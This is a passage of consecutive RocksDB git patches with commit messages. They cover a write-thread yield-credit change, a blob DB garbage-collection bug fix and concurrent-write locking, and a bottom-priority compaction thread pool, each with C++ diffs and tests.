Differential Revision: D5553732 Pulled By: maysamyabandeh fbshipit-source-id: 98b72dc3a8e0f22ea29d4f7c7790af10c369c5bb --- db/write_thread.cc | 32 ++++++++++++++++++++++++++------ 1 file changed, 26 insertions(+), 6 deletions(-) diff --git a/db/write_thread.cc b/db/write_thread.cc index 4a9fc1406bf..2d3b34602cc 100644 --- a/db/write_thread.cc +++ b/db/write_thread.cc @@ -57,6 +57,10 @@ uint8_t WriteThread::AwaitState(Writer* w, uint8_t goal_mask, AdaptationContext*
ctx) { uint8_t state; + // 1. Busy loop using "pause" for 1 micro sec + // 2. Else SOMETIMES busy loop using "yield" for 100 micro sec (default) + // 3. Else blocking wait + // On a modern Xeon each loop takes about 7 nanoseconds (most of which // is the effect of the pause instruction), so 200 iterations is a bit // more than a microsecond. This is long enough that waits longer than @@ -114,13 +118,21 @@ uint8_t WriteThread::AwaitState(Writer* w, uint8_t goal_mask, const size_t kMaxSlowYieldsWhileSpinning = 3; + // Whether the yield approach has any credit in this context. The credit is + // added by yield being successful before timing out, and decreased otherwise. + auto& yield_credit = ctx->value; + // Update the yield_credit based on sample runs or right after a hard failure bool update_ctx = false; + // Should we reinforce the yield credit bool would_spin_again = false; + // The sampling base for updating the yield credit. The sampling rate would be + // 1/sampling_base. + const int sampling_base = 256; if (max_yield_usec_ > 0) { - update_ctx = Random::GetTLSInstance()->OneIn(256); + update_ctx = Random::GetTLSInstance()->OneIn(sampling_base); - if (update_ctx || ctx->value.load(std::memory_order_relaxed) >= 0) { + if (update_ctx || yield_credit.load(std::memory_order_relaxed) >= 0) { // we're updating the adaptation statistics, or spinning has > // 50% chance of being shorter than max_yield_usec_ and causing no // involuntary context switches @@ -149,7 +161,7 @@ uint8_t WriteThread::AwaitState(Writer* w, uint8_t goal_mask, // accurate enough to measure the yield duration ++slow_yield_count; if (slow_yield_count >= kMaxSlowYieldsWhileSpinning) { - // Not just one ivcsw, but several. Immediately update ctx + // Not just one ivcsw, but several. Immediately update yield_credit // and fall back to blocking update_ctx = true; break; @@ -165,11 +177,19 @@ uint8_t WriteThread::AwaitState(Writer* w, uint8_t goal_mask, } if (update_ctx) { - auto v = ctx->value.load(std::memory_order_relaxed); + // Since our update is sample based, it is ok if a thread overwrites the + // updates of other threads. Thus the update does not have to be atomic. + auto v = yield_credit.load(std::memory_order_relaxed); // fixed point exponential decay with decay constant 1/1024, with +1 // and -1 scaled to avoid overflow for int32_t - v = v + (v / 1024) + (would_spin_again ? 1 : -1) * 16384; - ctx->value.store(v, std::memory_order_relaxed); + // + // On each update the positive credit is decayed by a factor of 1/1024 (i.e., + // 0.1%). If the sampled yield was successful, the credit is also increased + // by X. Setting X=2^17 ensures that the credit never exceeds + // 2^17*2^10=2^27, which is lower than 2^31, the upper bound of int32_t. The + // same logic applies to negative credits. + v = v - (v / 1024) + (would_spin_again ? 1 : -1) * 131072; + yield_credit.store(v, std::memory_order_relaxed); } assert((state & goal_mask) != 0); From 2c45ada4c4b09d4130b8bc0593c25f90d5dc8795 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 3 Aug 2017 12:56:44 -0700 Subject: [PATCH 071/205] Blob DB garbage collection should keep keys with newer version Summary: Fix the bug where blob db garbage collection removes keys with a newer version. It shouldn't delete the key from the base db when the sequence number in the base db is not equal to the one in the blob log.
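The essence of the fix in the diff below is an inverted check: instead of deleting from the base db whenever the lookup fails to confirm the record, GC now relocates a blob only when the lookup positively confirms that the blob's sequence number is still the latest one for the key, and leaves anything newer untouched. A condensed sketch of that decision (the enum and function names are illustrative, not from the patch; `SequenceNumber` is the real rocksdb type):

    #include "rocksdb/types.h"  // rocksdb::SequenceNumber

    enum class GcAction { kDelete, kRelocate, kKeep };

    GcAction DecideGcAction(bool ttl_expired, bool found_record_for_key,
                            rocksdb::SequenceNumber latest_seq,
                            rocksdb::SequenceNumber record_seq) {
      if (ttl_expired) {
        return GcAction::kDelete;  // the value is dead regardless of versions
      }
      if (found_record_for_key && latest_seq == record_seq) {
        return GcAction::kRelocate;  // blob record is still the live version
      }
      // A newer version exists (or the key is gone): leave the base db alone.
      return GcAction::kKeep;
    }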
Closes https://github.com/facebook/rocksdb/pull/2678 Differential Revision: D5549752 Pulled By: yiwu-arbug fbshipit-source-id: abb8649260963b5c389748023970fd746279d227 --- utilities/blob_db/blob_db_impl.cc | 136 ++++++++++++++++-------------- utilities/blob_db/blob_db_test.cc | 42 ++++++++- 2 files changed, 112 insertions(+), 66 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index 0488d99242a..f74307e191b 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -1712,10 +1712,17 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, gcstats->blob_count++; bool del_this = false; + bool reloc_this = false; + + // TODO(yiwu): The following logic should use GetForUpdate() from + // optimistic transaction to check if the key is current, otherwise + // another writer can sneak in between reading the sequence number + // and the deletion. + // this particular TTL has expired if (no_relocation_ttl || (has_ttl && tt > record.GetTTL())) { del_this = true; - } else { + } else if (!first_gc) { SequenceNumber seq = kMaxSequenceNumber; bool found_record_for_key = false; SuperVersion* sv = db_impl_->GetAndRefSuperVersion(cfd); @@ -1726,8 +1733,8 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, } Status s1 = db_impl_->GetLatestSequenceForKey( sv, record.Key(), false, &seq, &found_record_for_key); - if (s1.IsNotFound() || (!found_record_for_key || seq != record.GetSN())) { - del_this = true; + if (found_record_for_key && seq == record.GetSN()) { + reloc_this = true; } db_impl_->ReturnAndCleanupSuperVersion(cfd, sv); } @@ -1749,77 +1756,76 @@ Status BlobDBImpl::GCFileAndUpdateLSM(const std::shared_ptr& bfptr, gcstats->overrided_while_delete++; } delete txn; - continue; - } else if (first_gc) { - continue; } - if (!newfile) { - // new file - std::string reason("GC of "); - reason += bfptr->PathName(); - newfile = NewBlobFile(reason); - gcstats->newfile = newfile; - - new_writer = CheckOrCreateWriterLocked(newfile); - newfile->header_ = std::move(header); - // Can't use header beyond this point - newfile->header_valid_ = true; - newfile->file_size_ = BlobLogHeader::kHeaderSize; - s = new_writer->WriteHeader(newfile->header_); - - if (!s.ok()) { - ROCKS_LOG_ERROR(db_options_.info_log, - "File: %s - header writing failed", - newfile->PathName().c_str()); - return s; + if (reloc_this) { + if (!newfile) { + // new file + std::string reason("GC of "); + reason += bfptr->PathName(); + newfile = NewBlobFile(reason); + gcstats->newfile = newfile; + + new_writer = CheckOrCreateWriterLocked(newfile); + newfile->header_ = std::move(header); + // Can't use header beyond this point + newfile->header_valid_ = true; + newfile->file_size_ = BlobLogHeader::kHeaderSize; + s = new_writer->WriteHeader(newfile->header_); + + if (!s.ok()) { + ROCKS_LOG_ERROR(db_options_.info_log, + "File: %s - header writing failed", + newfile->PathName().c_str()); + return s; + } + + WriteLock wl(&mutex_); + + dir_change_.store(true); + blob_files_.insert(std::make_pair(newfile->BlobFileNumber(), newfile)); } WriteLock wl(&mutex_); + gcstats->num_relocs++; + std::string index_entry; - dir_change_.store(true); - blob_files_.insert(std::make_pair(newfile->BlobFileNumber(), newfile)); - } + uint64_t blob_offset = 0; + uint64_t key_offset = 0; + // write the blob to the blob log.
+ s = new_writer->AddRecord(record.Key(), record.Blob(), &key_offset, + &blob_offset, record.GetTTL()); - gcstats->num_relocs++; - std::string index_entry; + BlobHandle handle; + handle.set_filenumber(newfile->BlobFileNumber()); + handle.set_size(record.Blob().size()); + handle.set_offset(blob_offset); + handle.set_compression(bdb_options_.compression); + handle.EncodeTo(&index_entry); - uint64_t blob_offset = 0; - uint64_t key_offset = 0; - // write the blob to the blob log. - s = new_writer->AddRecord(record.Key(), record.Blob(), &key_offset, - &blob_offset, record.GetTTL()); + new_writer->AddRecordFooter(record.GetSN()); + newfile->blob_count_++; + newfile->file_size_ += BlobLogRecord::kHeaderSize + record.Key().size() + + record.Blob().size() + BlobLogRecord::kFooterSize; - BlobHandle handle; - handle.set_filenumber(newfile->BlobFileNumber()); - handle.set_size(record.Blob().size()); - handle.set_offset(blob_offset); - handle.set_compression(bdb_options_.compression); - handle.EncodeTo(&index_entry); - - new_writer->AddRecordFooter(record.GetSN()); - newfile->blob_count_++; - newfile->file_size_ += BlobLogRecord::kHeaderSize + record.Key().size() + - record.Blob().size() + BlobLogRecord::kFooterSize; - - Transaction* txn = opt_db_->BeginTransaction( - write_options_, OptimisticTransactionOptions(), nullptr); - txn->Put(cfh, record.Key(), index_entry); - Status s1 = txn->Commit(); - // chances that this Put will fail is low. If it fails, it would be because - // a new version of the key came in at this time, which will override - // the current version being iterated on. - if (s1.IsBusy()) { - ROCKS_LOG_INFO(db_options_.info_log, - "Optimistic transaction failed: %s put bn: %" PRIu32, - bfptr->PathName().c_str(), gcstats->blob_count); - } else { - gcstats->succ_relocs++; - ROCKS_LOG_DEBUG(db_options_.info_log, - "Successfully added put back into LSM: %s bn: %" PRIu32, - bfptr->PathName().c_str(), gcstats->blob_count); + Transaction* txn = opt_db_->BeginTransaction( + write_options_, OptimisticTransactionOptions(), nullptr); + txn->Put(cfh, record.Key(), index_entry); + Status s1 = txn->Commit(); + // chances that this Put will fail is low. If it fails, it would be + // because a new version of the key came in at this time, which will + // override the current version being iterated on. 
+ if (s1.IsBusy()) { + ROCKS_LOG_INFO(db_options_.info_log, + "Optimistic transaction failed: %s put bn: %" PRIu32, + bfptr->PathName().c_str(), gcstats->blob_count); + } else { + gcstats->succ_relocs++; + ROCKS_LOG_DEBUG(db_options_.info_log, + "Successfully added put back into LSM: %s bn: %" PRIu32, + bfptr->PathName().c_str(), gcstats->blob_count); + } + delete txn; + } } if (gcstats->newfile) total_blob_space_ += newfile->file_size_; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index a5f9795929f..a3873729cf5 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -12,6 +12,7 @@ #include #include "db/db_test_util.h" #include "port/port.h" +#include "util/cast_util.h" #include "util/random.h" #include "util/string_util.h" #include "util/testharness.h" @@ -531,7 +532,8 @@ TEST_F(BlobDBTest, SequenceNumber) { bdb_options.disable_background_tasks = true; Open(bdb_options); SequenceNumber sequence = blob_db_->GetLatestSequenceNumber(); - BlobDBImpl *blob_db_impl = reinterpret_cast(blob_db_); + BlobDBImpl *blob_db_impl = + static_cast_with_check(blob_db_); for (int i = 0; i < 100; i++) { std::string key = "key" + ToString(i); PutRandom(key, &rnd); @@ -560,6 +562,44 @@ TEST_F(BlobDBTest, SequenceNumber) { } } +TEST_F(BlobDBTest, GCShouldKeepKeysWithNewerVersion) { + Random rnd(301); + BlobDBOptions bdb_options; + bdb_options.disable_background_tasks = true; + Open(bdb_options); + BlobDBImpl *blob_db_impl = + static_cast_with_check(blob_db_); + DBImpl *db_impl = static_cast_with_check(blob_db_->GetBaseDB()); + std::map data; + for (int i = 0; i < 200; i++) { + PutRandom("key" + ToString(i), &rnd, &data); + } + auto blob_files = blob_db_impl->TEST_GetBlobFiles(); + ASSERT_EQ(1, blob_files.size()); + blob_db_impl->TEST_CloseBlobFile(blob_files[0]); + // Test for data in SST + size_t new_keys = 0; + for (int i = 0; i < 100; i++) { + if (rnd.Next() % 2 == 1) { + new_keys++; + PutRandom("key" + ToString(i), &rnd, &data); + } + } + db_impl->TEST_FlushMemTable(true /*wait*/); + // Test for data in memtable + for (int i = 100; i < 200; i++) { + if (rnd.Next() % 2 == 1) { + new_keys++; + PutRandom("key" + ToString(i), &rnd, &data); + } + } + GCStats gc_stats; + ASSERT_OK(blob_db_impl->TEST_GCFileAndUpdateLSM(blob_files[0], &gc_stats)); + ASSERT_EQ(0, gc_stats.num_deletes); + ASSERT_EQ(200 - new_keys, gc_stats.num_relocs); + VerifyDB(data); +} + } // namespace blob_db } // namespace rocksdb From 0b814ba92d70017a652603665295a3629927cfe1 Mon Sep 17 00:00:00 2001 From: Yi Wu Date: Thu, 3 Aug 2017 15:07:01 -0700 Subject: [PATCH 072/205] Allow concurrent writes to blob db Summary: I'm going with a brute-force solution: just let Put() and Write() hold a mutex before writing. We may improve concurrent writing with finer-granularity locking later.
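The change below is the classic coarse-grained serialization pattern: every write entry point acquires one shared mutex for the duration of the call, trading peak write concurrency for simplicity. A self-contained sketch of the idea using only the standard library (the patch itself uses rocksdb's internal `port::Mutex` and `MutexLock`; the class and method bodies here are illustrative):

    #include <mutex>
    #include <string>

    class SerializedBlobWriter {
     public:
      void Put(const std::string& key, const std::string& value) {
        std::lock_guard<std::mutex> l(write_mutex_);  // held for the whole write
        // ... assign a sequence number, append to the blob log, update index ...
      }

      void Write(/* a batch of updates */) {
        std::lock_guard<std::mutex> l(write_mutex_);  // same lock as Put()
        // ... apply the whole batch under the lock ...
      }

     private:
      std::mutex write_mutex_;  // all writers funnel through this single lock
    };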
Closes https://github.com/facebook/rocksdb/pull/2682 Differential Revision: D5552690 Pulled By: yiwu-arbug fbshipit-source-id: 039abd675b5d274a7af6428198d1733cafecef4c --- utilities/blob_db/blob_db_impl.cc | 4 ++++ utilities/blob_db/blob_db_impl.h | 3 +++ utilities/blob_db/blob_db_test.cc | 33 +++++++++++++++++++++++-------- 3 files changed, 32 insertions(+), 8 deletions(-) diff --git a/utilities/blob_db/blob_db_impl.cc b/utilities/blob_db/blob_db_impl.cc index f74307e191b..1afdc94a06e 100644 --- a/utilities/blob_db/blob_db_impl.cc +++ b/utilities/blob_db/blob_db_impl.cc @@ -28,6 +28,7 @@ #include "util/file_reader_writer.h" #include "util/filename.h" #include "util/logging.h" +#include "util/mutexlock.h" #include "util/random.h" #include "util/timer_queue.h" #include "utilities/transactions/optimistic_transaction_db_impl.h" @@ -878,6 +879,8 @@ Status BlobDBImpl::Write(const WriteOptions& opts, WriteBatch* updates) { } }; + MutexLock l(&write_mutex_); + SequenceNumber sequence = db_impl_->GetLatestSequenceNumber() + 1; BlobInserter blob_inserter(this, sequence); updates->Iterate(&blob_inserter); @@ -953,6 +956,7 @@ Slice BlobDBImpl::GetCompressedSlice(const Slice& raw, Status BlobDBImpl::PutUntil(const WriteOptions& options, ColumnFamilyHandle* column_family, const Slice& key, const Slice& value_unc, int32_t expiration) { + MutexLock l(&write_mutex_); UpdateWriteOptions(options); std::shared_ptr bfile = diff --git a/utilities/blob_db/blob_db_impl.h b/utilities/blob_db/blob_db_impl.h index 95a387afe37..5105c8c17b1 100644 --- a/utilities/blob_db/blob_db_impl.h +++ b/utilities/blob_db/blob_db_impl.h @@ -447,6 +447,9 @@ class BlobDBImpl : public BlobDB { // HEAVILY TRAFFICKED port::RWMutex mutex_; + // Writers have to hold write_mutex_ before writing. + mutable port::Mutex write_mutex_; + // counter for blob file number std::atomic next_file_number_; diff --git a/utilities/blob_db/blob_db_test.cc b/utilities/blob_db/blob_db_test.cc index a3873729cf5..199a9e0750a 100644 --- a/utilities/blob_db/blob_db_test.cc +++ b/utilities/blob_db/blob_db_test.cc @@ -511,18 +511,35 @@ TEST_F(BlobDBTest, Compression) { } #endif -TEST_F(BlobDBTest, DISABLED_MultipleWriters) { - Open(); +TEST_F(BlobDBTest, MultipleWriters) { + Open(BlobDBOptions()); std::vector workers; - for (size_t ii = 0; ii < 10; ii++) - workers.push_back(port::Thread(&BlobDBTest::InsertBlobs, this)); - - for (auto& t : workers) { - if (t.joinable()) { - t.join(); + std::vector> data_set(10); + for (uint32_t i = 0; i < 10; i++) + workers.push_back(port::Thread( + [&](uint32_t id) { + Random rnd(301 + id); + for (int j = 0; j < 100; j++) { + std::string key = "key" + ToString(id) + "_" + ToString(j); + if (id < 5) { + PutRandom(key, &rnd, &data_set[id]); + } else { + WriteBatch batch; + PutRandomToWriteBatch(key, &rnd, &batch, &data_set[id]); + blob_db_->Write(WriteOptions(), &batch); + } + } + }, + i)); + std::map data; + for (size_t i = 0; i < 10; i++) { + if (workers[i].joinable()) { + workers[i].join(); } + data.insert(data_set[i].begin(), data_set[i].end()); } + VerifyDB(data); } // Test sequence number store in blob file is correct. From cc01985db09b3f8ebb2ba971aa505abd77fa6345 Mon Sep 17 00:00:00 2001 From: Andrew Kryczka Date: Thu, 3 Aug 2017 15:36:28 -0700 Subject: [PATCH 073/205] Introduce bottom-pri thread pool for large universal compactions Summary: When we had a single thread pool for compactions, a thread could be busy for a long time (minutes) executing a compaction involving the bottom level.
In multi-instance setups, the entire thread pool could be consumed by such bottom-level compactions. Then, top-level compactions (e.g., a few L0 files) would be blocked for a long time ("head-of-line blocking"). Such top-level compactions are critical to prevent compaction stalls as they can quickly reduce the number of L0 files / sorted runs. This diff introduces a bottom-priority queue for universal compactions including the bottom level. This alleviates the head-of-line blocking situation for fast, top-level compactions. - Added `Env::Priority::BOTTOM` thread pool. This feature is only enabled if the user explicitly configures it to have a positive number of threads. - Changed `ThreadPoolImpl`'s default thread limit from one to zero. This change is invisible to users as we call `IncBackgroundThreadsIfNeeded` on the low-pri/high-pri pools during `DB::Open` with values of at least one. It is necessary, though, for bottom-pri to start with zero threads so the feature is disabled by default. - Separated `ManualCompaction` into two parts in `PrepickedCompaction`. `PrepickedCompaction` is used for any compaction that's picked outside of its execution thread, either manual or automatic. - Forward universal compactions involving the last level to the bottom pool (worker thread's entry point is `BGWorkBottomCompaction`). - Track `bg_bottom_compaction_scheduled_` so we can wait for bottom-level compactions to finish. We don't count them against the background jobs limits, so users of this feature get an extra compaction for free. Closes https://github.com/facebook/rocksdb/pull/2580 Differential Revision: D5422916 Pulled By: ajkr fbshipit-source-id: a74bd11f1ea4933df3739b16808bb21fcd512333 --- HISTORY.md | 1 + db/db_impl.cc | 11 ++- db/db_impl.h | 36 ++++++-- db/db_impl_compaction_flush.cc | 143 ++++++++++++++++++++--------- db/db_impl_debug.cc | 4 +- db/db_universal_compaction_test.cc | 97 +++++++++++++++++++ db/version_set.cc | 8 ++ db/version_set.h | 1 + env/env_posix.cc | 12 +-- env/env_test.cc | 14 +-- include/rocksdb/env.h | 2 +- memtable/inlineskiplist_test.cc | 1 + memtable/skiplist_test.cc | 1 + tools/db_bench_tool.cc | 6 ++ util/threadpool_imp.cc | 6 +- 15 files changed, 273 insertions(+), 70 deletions(-) diff --git a/HISTORY.md b/HISTORY.md index 53ff4b9cf0b..7c71fdd1687 100644 --- a/HISTORY.md +++ b/HISTORY.md @@ -3,6 +3,7 @@ ### New Features * Add Iterator::Refresh(), which allows users to update the iterator state so that they can avoid some initialization costs of recreating iterators. * Replace dynamic_cast<> (except unit test) so people can choose to build with RTTI off. With make, release mode is by default built with -fno-rtti and debug mode is built without it. Users can override it by setting USE_RTTI=0 or 1. +* Universal compactions including the bottom level can be executed in a dedicated thread pool. This alleviates head-of-line blocking in the compaction queue, which can cause write stalling, particularly in multi-instance use cases. Users can enable this feature via `Env::SetBackgroundThreads(N, Env::Priority::BOTTOM)`, where `N > 0`. ### Bug Fixes * Fix wrong latencies in `rocksdb.db.get.micros`, `rocksdb.db.write.micros`, and `rocksdb.sst.read.micros`.
diff --git a/db/db_impl.cc b/db/db_impl.cc index bfe38302fc6..86bb4a43381 100644 --- a/db/db_impl.cc +++ b/db/db_impl.cc @@ -168,6 +168,7 @@ DBImpl::DBImpl(const DBOptions& options, const std::string& dbname) last_batch_group_size_(0), unscheduled_flushes_(0), unscheduled_compactions_(0), + bg_bottom_compaction_scheduled_(0), bg_compaction_scheduled_(0), num_running_compactions_(0), bg_flush_scheduled_(0), @@ -242,7 +243,8 @@ void DBImpl::CancelAllBackgroundWork(bool wait) { return; } // Wait for background work to finish - while (bg_compaction_scheduled_ || bg_flush_scheduled_) { + while (bg_bottom_compaction_scheduled_ || bg_compaction_scheduled_ || + bg_flush_scheduled_) { bg_cv_.Wait(); } } @@ -252,15 +254,18 @@ DBImpl::~DBImpl() { // marker. After this we do a variant of the waiting and unschedule work // (to consider: moving all the waiting into CancelAllBackgroundWork(true)) CancelAllBackgroundWork(false); + int bottom_compactions_unscheduled = + env_->UnSchedule(this, Env::Priority::BOTTOM); int compactions_unscheduled = env_->UnSchedule(this, Env::Priority::LOW); int flushes_unscheduled = env_->UnSchedule(this, Env::Priority::HIGH); mutex_.Lock(); + bg_bottom_compaction_scheduled_ -= bottom_compactions_unscheduled; bg_compaction_scheduled_ -= compactions_unscheduled; bg_flush_scheduled_ -= flushes_unscheduled; // Wait for background work to finish - while (bg_compaction_scheduled_ || bg_flush_scheduled_ || - bg_purge_scheduled_) { + while (bg_bottom_compaction_scheduled_ || bg_compaction_scheduled_ || + bg_flush_scheduled_ || bg_purge_scheduled_) { TEST_SYNC_POINT("DBImpl::~DBImpl:WaitJob"); bg_cv_.Wait(); } diff --git a/db/db_impl.h b/db/db_impl.h index 3284048a688..d89ea50cad8 100644 --- a/db/db_impl.h +++ b/db/db_impl.h @@ -658,6 +658,7 @@ class DBImpl : public DB { } }; + struct PrepickedCompaction; struct PurgeFileInfo; // Recover the descriptor from persistent storage. May do a significant @@ -799,14 +800,19 @@ class DBImpl : public DB { void SchedulePendingPurge(std::string fname, FileType type, uint64_t number, uint32_t path_id, int job_id); static void BGWorkCompaction(void* arg); + // Runs a pre-chosen universal compaction involving bottom level in a + // separate, bottom-pri thread pool. 
+ static void BGWorkBottomCompaction(void* arg); static void BGWorkFlush(void* db); static void BGWorkPurge(void* arg); static void UnscheduleCallback(void* arg); - void BackgroundCallCompaction(void* arg); + void BackgroundCallCompaction(PrepickedCompaction* prepicked_compaction, + Env::Priority bg_thread_pri); void BackgroundCallFlush(); void BackgroundCallPurge(); Status BackgroundCompaction(bool* madeProgress, JobContext* job_context, - LogBuffer* log_buffer, void* m = 0); + LogBuffer* log_buffer, + PrepickedCompaction* prepicked_compaction); Status BackgroundFlush(bool* madeProgress, JobContext* job_context, LogBuffer* log_buffer); @@ -1059,6 +1065,10 @@ class DBImpl : public DB { int unscheduled_flushes_; int unscheduled_compactions_; + // count how many background compactions are running or have been scheduled in + // the BOTTOM pool + int bg_bottom_compaction_scheduled_; + // count how many background compactions are running or have been scheduled int bg_compaction_scheduled_; @@ -1075,7 +1085,7 @@ class DBImpl : public DB { int bg_purge_scheduled_; // Information for a manual compaction - struct ManualCompaction { + struct ManualCompactionState { ColumnFamilyData* cfd; int input_level; int output_level; @@ -1091,13 +1101,21 @@ class DBImpl : public DB { InternalKey* manual_end; // how far we are compacting InternalKey tmp_storage; // Used to keep track of compaction progress InternalKey tmp_storage1; // Used to keep track of compaction progress + }; + struct PrepickedCompaction { + // background compaction takes ownership of `compaction`. Compaction* compaction; + // caller retains ownership of `manual_compaction_state` as it is reused + // across background compactions. + ManualCompactionState* manual_compaction_state; // nullptr if non-manual }; - std::deque manual_compaction_dequeue_; + std::deque manual_compaction_dequeue_; struct CompactionArg { + // caller retains ownership of `db`. DBImpl* db; - ManualCompaction* m; + // background compaction takes ownership of `prepicked_compaction`. + PrepickedCompaction* prepicked_compaction; }; // Have we encountered a background error in paranoid mode? 
@@ -1231,11 +1249,11 @@ class DBImpl : public DB { bool HasPendingManualCompaction(); bool HasExclusiveManualCompaction(); - void AddManualCompaction(ManualCompaction* m); - void RemoveManualCompaction(ManualCompaction* m); - bool ShouldntRunManualCompaction(ManualCompaction* m); + void AddManualCompaction(ManualCompactionState* m); + void RemoveManualCompaction(ManualCompactionState* m); + bool ShouldntRunManualCompaction(ManualCompactionState* m); bool HaveManualCompaction(ColumnFamilyData* cfd); - bool MCOverlap(ManualCompaction* m, ManualCompaction* m1); + bool MCOverlap(ManualCompactionState* m, ManualCompactionState* m1); size_t GetWalPreallocateBlockSize(uint64_t write_buffer_size) const; diff --git a/db/db_impl_compaction_flush.cc b/db/db_impl_compaction_flush.cc index 68d2831233b..3e686fe7039 100644 --- a/db/db_impl_compaction_flush.cc +++ b/db/db_impl_compaction_flush.cc @@ -612,7 +612,8 @@ Status DBImpl::CompactFilesImpl( Status DBImpl::PauseBackgroundWork() { InstrumentedMutexLock guard_lock(&mutex_); bg_compaction_paused_++; - while (bg_compaction_scheduled_ > 0 || bg_flush_scheduled_ > 0) { + while (bg_bottom_compaction_scheduled_ > 0 || bg_compaction_scheduled_ > 0 || + bg_flush_scheduled_ > 0) { bg_cv_.Wait(); } bg_work_paused_++; @@ -808,7 +809,7 @@ Status DBImpl::RunManualCompaction(ColumnFamilyData* cfd, int input_level, bool scheduled = false; bool manual_conflict = false; - ManualCompaction manual; + ManualCompactionState manual; manual.cfd = cfd; manual.input_level = input_level; manual.output_level = output_level; @@ -858,7 +859,8 @@ Status DBImpl::RunManualCompaction(ColumnFamilyData* cfd, int input_level, AddManualCompaction(&manual); TEST_SYNC_POINT_CALLBACK("DBImpl::RunManualCompaction:NotScheduled", &mutex_); if (exclusive) { - while (bg_compaction_scheduled_ > 0) { + while (bg_bottom_compaction_scheduled_ > 0 || + bg_compaction_scheduled_ > 0) { TEST_SYNC_POINT("DBImpl::RunManualCompaction:WaitScheduled"); ROCKS_LOG_INFO( immutable_db_options_.info_log, @@ -878,14 +880,14 @@ Status DBImpl::RunManualCompaction(ColumnFamilyData* cfd, int input_level, while (!manual.done) { assert(HasPendingManualCompaction()); manual_conflict = false; + Compaction* compaction; if (ShouldntRunManualCompaction(&manual) || (manual.in_progress == true) || scheduled || - ((manual.manual_end = &manual.tmp_storage1)&&( - (manual.compaction = manual.cfd->CompactRange( - *manual.cfd->GetLatestMutableCFOptions(), manual.input_level, - manual.output_level, manual.output_path_id, manual.begin, - manual.end, &manual.manual_end, &manual_conflict)) == - nullptr) && + ((manual.manual_end = &manual.tmp_storage1) && + ((compaction = manual.cfd->CompactRange( + *manual.cfd->GetLatestMutableCFOptions(), manual.input_level, + manual.output_level, manual.output_path_id, manual.begin, + manual.end, &manual.manual_end, &manual_conflict)) == nullptr) && manual_conflict)) { // exclusive manual compactions should not see a conflict during // CompactRange @@ -898,14 +900,16 @@ Status DBImpl::RunManualCompaction(ColumnFamilyData* cfd, int input_level, manual.incomplete = false; } } else if (!scheduled) { - if (manual.compaction == nullptr) { + if (compaction == nullptr) { manual.done = true; bg_cv_.SignalAll(); continue; } ca = new CompactionArg; ca->db = this; - ca->m = &manual; + ca->prepicked_compaction = new PrepickedCompaction; + ca->prepicked_compaction->manual_compaction_state = &manual; + ca->prepicked_compaction->compaction = compaction; manual.incomplete = false; bg_compaction_scheduled_++; 
env_->Schedule(&DBImpl::BGWorkCompaction, ca, Env::Priority::LOW, this, @@ -1047,7 +1051,7 @@ void DBImpl::MaybeScheduleFlushOrCompaction() { unscheduled_compactions_ > 0) { CompactionArg* ca = new CompactionArg; ca->db = this; - ca->m = nullptr; + ca->prepicked_compaction = nullptr; bg_compaction_scheduled_++; unscheduled_compactions_--; env_->Schedule(&DBImpl::BGWorkCompaction, ca, Env::Priority::LOW, this, @@ -1152,7 +1156,23 @@ void DBImpl::BGWorkCompaction(void* arg) { delete reinterpret_cast(arg); IOSTATS_SET_THREAD_POOL_ID(Env::Priority::LOW); TEST_SYNC_POINT("DBImpl::BGWorkCompaction"); - reinterpret_cast(ca.db)->BackgroundCallCompaction(ca.m); + auto prepicked_compaction = + static_cast(ca.prepicked_compaction); + reinterpret_cast(ca.db)->BackgroundCallCompaction( + prepicked_compaction, Env::Priority::LOW); + delete prepicked_compaction; +} + +void DBImpl::BGWorkBottomCompaction(void* arg) { + CompactionArg ca = *(static_cast(arg)); + delete static_cast(arg); + IOSTATS_SET_THREAD_POOL_ID(Env::Priority::BOTTOM); + TEST_SYNC_POINT("DBImpl::BGWorkBottomCompaction"); + auto* prepicked_compaction = ca.prepicked_compaction; + assert(prepicked_compaction && prepicked_compaction->compaction && + !prepicked_compaction->manual_compaction_state); + ca.db->BackgroundCallCompaction(prepicked_compaction, Env::Priority::BOTTOM); + delete prepicked_compaction; } void DBImpl::BGWorkPurge(void* db) { @@ -1165,8 +1185,11 @@ void DBImpl::BGWorkPurge(void* db) { void DBImpl::UnscheduleCallback(void* arg) { CompactionArg ca = *(reinterpret_cast(arg)); delete reinterpret_cast(arg); - if ((ca.m != nullptr) && (ca.m->compaction != nullptr)) { - delete ca.m->compaction; + if (ca.prepicked_compaction != nullptr) { + if (ca.prepicked_compaction->compaction != nullptr) { + delete ca.prepicked_compaction->compaction; + } + delete ca.prepicked_compaction; } TEST_SYNC_POINT("DBImpl::UnscheduleCallback"); } @@ -1293,9 +1316,9 @@ void DBImpl::BackgroundCallFlush() { } } -void DBImpl::BackgroundCallCompaction(void* arg) { +void DBImpl::BackgroundCallCompaction(PrepickedCompaction* prepicked_compaction, + Env::Priority bg_thread_pri) { bool made_progress = false; - ManualCompaction* m = reinterpret_cast(arg); JobContext job_context(next_job_id_.fetch_add(1), true); TEST_SYNC_POINT("BackgroundCallCompaction:0"); MaybeDumpStats(); @@ -1313,9 +1336,11 @@ void DBImpl::BackgroundCallCompaction(void* arg) { auto pending_outputs_inserted_elem = CaptureCurrentFileNumberInPendingOutputs(); - assert(bg_compaction_scheduled_); - Status s = - BackgroundCompaction(&made_progress, &job_context, &log_buffer, m); + assert((bg_thread_pri == Env::Priority::BOTTOM && + bg_bottom_compaction_scheduled_) || + (bg_thread_pri == Env::Priority::LOW && bg_compaction_scheduled_)); + Status s = BackgroundCompaction(&made_progress, &job_context, &log_buffer, + prepicked_compaction); TEST_SYNC_POINT("BackgroundCallCompaction:1"); if (!s.ok() && !s.IsShutdownInProgress()) { // Wait a little bit before retrying background compaction in @@ -1361,17 +1386,24 @@ void DBImpl::BackgroundCallCompaction(void* arg) { assert(num_running_compactions_ > 0); num_running_compactions_--; - bg_compaction_scheduled_--; + if (bg_thread_pri == Env::Priority::LOW) { + bg_compaction_scheduled_--; + } else { + assert(bg_thread_pri == 